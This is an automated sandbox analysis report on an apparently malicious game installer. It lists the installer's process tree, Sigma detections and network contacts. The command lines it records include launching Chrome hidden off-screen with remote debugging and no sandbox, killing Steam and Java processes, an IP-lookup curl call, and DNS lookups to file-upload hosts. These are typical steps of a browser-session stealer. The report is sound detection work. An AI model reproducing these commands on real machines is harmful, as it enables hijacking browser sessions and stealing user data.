      • tasklist.exe (PID: 6908 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 8232 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • tasklist.exe (PID: 8292 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 8324 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM Steam.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 8380 cmdline: taskkill /IM Steam.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 8412 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM javaw.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 8468 cmdline: taskkill /IM javaw.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 8500 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • tasklist.exe (PID: 8556 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 8588 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • tasklist.exe (PID: 8644 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 8676 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • tasklist.exe (PID: 8732 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 8764 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • tasklist.exe (PID: 8820 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 8852 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • tasklist.exe (PID: 8908 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Browser Started with Remote Debugging
Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9223 --profile-directory=Default --disable-gpu --no-sandbox --window-position=-32000,-32000, CommandLine: "C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9223 --profile-directory=Default --disable-gpu --no-sandbox --window-position=-32000,-32000, CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe" , ParentImage: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe, ParentProcessId: 7488, ParentProcessName: YoransSetup.exe, ProcessCommandLine: "C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9223 --profile-directory=Default --disable-gpu --no-sandbox --window-position=-32000,-32000, ProcessId: 8092, ProcessName: chrome.exe
Sigma detected: Usage Of Web Request Commands And Cmdlets
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke", CommandLine: C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe" , ParentImage: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe, ParentProcessId: 7488, ParentProcessName: YoransSetup.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke", ProcessId: 4592, ProcessName: cmd.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName, CommandLine: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6464, ParentProcessName: cmd.exe, ProcessCommandLine: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName, ProcessId: 5652, ProcessName: powershell.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results
Source: Yoranis Setup.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\Yoranis Setup.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\b4a0680f-9ee1-57b1-adfd-e68812be32d6Jump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile created: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\LICENSE.electron.txtJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile created: C:\Users\user\AppData\Local\Programs\unrealgame\LICENSE.electron.txtJump to behavior
Source: Yoranis Setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\projects\src\out\Default\dxcompiler.dll.pdb source: Yoranis Setup.exe, 00000000.00000003.330047764144.0000000007A01000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile opened: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\resources\app.asar.unpackedJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile opened: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\resourcesJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile opened: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\resources\app.asar.unpacked\node_modulesJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile opened: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\resources\app.asar.unpacked\node_modules\registry-js\buildJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile opened: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\localesJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile opened: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\resources\app.asar.unpacked\node_modules\registry-jsJump to behavior
Source: Joe Sandbox ViewIP Address: 9.9.9.9 9.9.9.9
Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox ViewIP Address: 143.244.215.221 143.244.215.221
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 239.255.255.250
Source: unknownUDP traffic detected without corresponding DNS query: 239.255.255.250
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 239.255.255.250
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgUser-Agent: curl/7.55.1Accept: */*
Source: global trafficDNS traffic detected: DNS query: api.ipify.org
Source: global trafficDNS traffic detected: DNS query: api.iwannaeatcats.com
Source: global trafficDNS traffic detected: DNS query: api.gofile.io
Source: global trafficDNS traffic detected: DNS query: file.io
Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global trafficDNS traffic detected: DNS query: assets.msn.com
Source: global trafficDNS traffic detected: DNS query: api.msn.com
Source: global trafficDNS traffic detected: DNS query: c.msn.com
Source: global trafficDNS traffic detected: DNS query: dns.quad9.net
Source: global trafficTCP traffic: 192.168.11.20:53645 -> 239.255.255.250:1900
Source: global trafficTCP traffic: 192.168.11.20:53645 -> 239.255.255.250:1900
Source: global trafficTCP traffic: 192.168.11.20:53645 -> 239.255.255.250:1900
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://10.0.0.1/
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://10.0.0.1:1337/
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://10.0.0.1:80/
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://10.0.0.2/
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://10.0.0.2:1337/
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://10.0.0.2:80/
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1/32
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://2x.io)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://a.b.example
Source: curl.exe, 0000000E.00000002.330302534079.00000201D98D0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000002.330302534079.00000201D98D7000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000002.330302717861.00000201D98EF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000003.330301939739.00000201D98EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/
Source: curl.exe, 0000000E.00000002.330302534079.00000201D98D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/--ssl-no-revoke
Source: curl.exe, 0000000E.00000002.330302717861.00000201D98EF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000003.330301939739.00000201D98EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/j
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://blog.izs.me)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://blog.izs.me/)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/issue5752
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://code.google.com/p/chromium/issues/detail?id=76293
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://code.google.com/p/gyp/
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://code.google.com/p/gyp/issues/detail?id=122
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://code.google.com/p/gyp/wiki/GypLanguageSpecification
Source: resources.pak.0.drString found in binary or memory: http://crbug.com/1352358
Source: Yoranis Setup.exe, 00000000.00000003.330022143469.0000000005250000.00000004.00001000.00020000.00000000.sdmp, resources.pak.0.drString found in binary or memory: http://crbug.com/275944
Source: resources.pak.0.drString found in binary or memory: http://crbug.com/378067
Source: Yoranis Setup.exe, 00000000.00000003.330022143469.0000000005250000.00000004.00001000.00020000.00000000.sdmp, resources.pak.0.drString found in binary or memory: http://crbug.com/437891.
Source: resources.pak.0.drString found in binary or memory: http://crbug.com/456214
Source: resources.pak.0.drString found in binary or memory: http://crbug.com/497301
Source: resources.pak.0.drString found in binary or memory: http://crbug.com/510270
Source: resources.pak.0.drString found in binary or memory: http://crbug.com/514696
Source: resources.pak.0.drString found in binary or memory: http://crbug.com/642141
Source: Yoranis Setup.exe, 00000000.00000003.330022143469.0000000005250000.00000004.00001000.00020000.00000000.sdmp, resources.pak.0.drString found in binary or memory: http://crbug.com/672186).
Source: resources.pak.0.drString found in binary or memory: http://crbug.com/717501
Source: resources.pak.0.drString found in binary or memory: http://crbug.com/775961
Source: resources.pak.0.drString found in binary or memory: http://crbug.com/819404
Source: resources.pak.0.drString found in binary or memory: http://crbug.com/839189
Source: Yoranis Setup.exe, 00000000.00000003.330022143469.0000000005250000.00000004.00001000.00020000.00000000.sdmp, resources.pak.0.drString found in binary or memory: http://crbug.com/957772
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38D/SP-800-38D.pdf
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://debuggable.com/)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://dominictarr.com)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://example.no
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://example.sub
Source: Yoranis Setup.exe, 00000000.00000003.330023771717.0000000005E50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://freedesktop.org
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://github.com/troygoode/)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://indigounited.com)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://istanbul-js.org/
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://maxao.free.fr/xcode-plugin-interface/specifications.html
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://n8.io/
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://n8.io/)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://no.sub.example
Source: Yoranis Setup.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://re-becca.org)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://re-becca.org/)
Source: Yoranis Setup.exe, 00000000.00000003.330023771717.0000000005E50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://src.chromium.org/viewvc/chrome/trunk/deps/third_party/xz/COPYING
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://stackoverflow.com/a/1068308/13216
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://stackoverflow.com/a/62888/10333
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://stackoverflow.com/questions/37519828
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://sub.example
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://sub.example:1337
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://sub.example:80
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tootallnate.net)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://travis-ci.org/troygoode/node-require-directory)
Source: Yoranis Setup.exe, 00000000.00000003.330023771717.0000000005E50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tukaani.org/xz/
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://unexpected.proxy
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmp, Yoranis Setup.exe, 00000000.00000003.330023771717.0000000005E50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmp, Yoranis Setup.exe, 00000000.00000003.330023771717.0000000005E50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.exodus.io)
Source: Yoranis Setup.exe, 00000000.00000003.330023771717.0000000005E50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.freedesktop.org/wiki/Software/xdg-user-dirs
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.futurealoof.com)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.opensource.org/licenses/mit-license.php)
Source: Yoranis Setup.exe, 00000000.00000003.330023771717.0000000005E50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.unicode.org/copyright.html
Source: Yoranis Setup.exe, 00000000.00000003.330023771717.0000000005E50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.webrtc.org
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://x.prefexample
Source: Yoranis Setup.exe, 00000000.00000003.330023771717.0000000005E50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://zlib.net/
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bugs.chromium.org/p/gyp/issues/detail?id=530
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bugs.chromium.org/p/v8/issues/detail?id=3056
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bugs.chromium.org/p/v8/issues/detail?id=4118
Source: resources.pak.0.drString found in binary or memory: https://chrome.google.com/webstore
Source: uk.pak.0.dr, en-US.pak.0.dr, fr.pak.0.dr, pt-BR.pak.0.drString found in binary or memory: https://chrome.google.com/webstore/category/extensions
Source: en-US.pak.0.drString found in binary or memory: https://chrome.google.com/webstore?hl=en&category=theme81https://myactivity.google.com/myactivity/?u
Source: en-US.pak.0.drString found in binary or memory: https://chrome.google.com/webstore?hl=enCtrl$1
Source: fr.pak.0.drString found in binary or memory: https://chrome.google.com/webstore?hl=fr&category=theme81https://myactivity.google.com/myactivity/?u
Source: fr.pak.0.drString found in binary or memory: https://chrome.google.com/webstore?hl=frCtrl$1
Source: pt-BR.pak.0.drString found in binary or memory: https://chrome.google.com/webstore?hl=pt-BRCtrl$1
Source: uk.pak.0.drString found in binary or memory: https://chrome.google.com/webstore?hl=uk&category=theme81https://myactivity.google.com/myactivity/?u
Source: uk.pak.0.drString found in binary or memory: https://chrome.google.com/webstore?hl=ukCtrl$1
Source: uk.pak.0.dr, en-US.pak.0.dr, fr.pak.0.drString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherEnabled
Source: uk.pak.0.dr, en-US.pak.0.dr, fr.pak.0.drString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalGreylistUrl
Source: uk.pak.0.dr, en-US.pak.0.dr, fr.pak.0.drString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalSitelistUrl
Source: uk.pak.0.dr, en-US.pak.0.dr, fr.pak.0.drString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlGreylist
Source: uk.pak.0.dr, en-US.pak.0.dr, fr.pak.0.drString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlList
Source: uk.pak.0.dr, en-US.pak.0.dr, fr.pak.0.drString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUseIeSitelist
Source: uk.pak.0.dr, en-US.pak.0.dr, fr.pak.0.drString found in binary or memory: https://chromestatus.com/features#browsers.chrome.status%3A%22Deprecated%22
Source: Yoranis Setup.exe, 00000000.00000003.330022143469.0000000005250000.00000004.00001000.00020000.00000000.sdmp, resources.pak.0.drString found in binary or memory: https://chromewebstore.google.com/
Source: Yoranis Setup.exe, 00000000.00000003.330023771717.0000000005E50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromium.googlesource.com/webm/libwebm
Source: Yoranis Setup.exe, 00000000.00000003.330023771717.0000000005E50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromium.googlesource.com/webm/libwebp
Source: resources.pak.0.drString found in binary or memory: https://codereview.chromium.org/25305002).
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://coveralls.io/github/JoshGlazebrook/smart-buffer?branch=master)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://coveralls.io/repos/github/JoshGlazebrook/smart-buffer/badge.svg?branch=master)
Source: resources.pak.0.drString found in binary or memory: https://crbug.com/1201800
Source: resources.pak.0.drString found in binary or memory: https://crbug.com/1245093):
Source: resources.pak.0.drString found in binary or memory: https://crbug.com/1446731
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://developer.apple.com/download/more/
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/endsWith
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/includes
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/startsWith
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://download.developer.apple.com/Developer_Tools/Command_Line_Tools_for_Xcode_11.5/Command_Line_
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://eslint.org/docs/rules/no-buffer-constructor)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://feross.org
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://feross.org/opensource
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://feross.org/support
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/ChALkeR
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/ChALkeR/safer-buffer.git
Source: Yoranis Setup.exe, 00000000.00000003.330023771717.0000000005E50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/Cyan4973/xxHash
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/JoshGlazebrook/smart-buffer.git
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/JoshGlazebrook/smart-buffer/
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/JoshGlazebrook/socks#api-reference)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/JoshGlazebrook/socks.git
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/JoshGlazebrook/socks/
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/MeriemKhelifi)
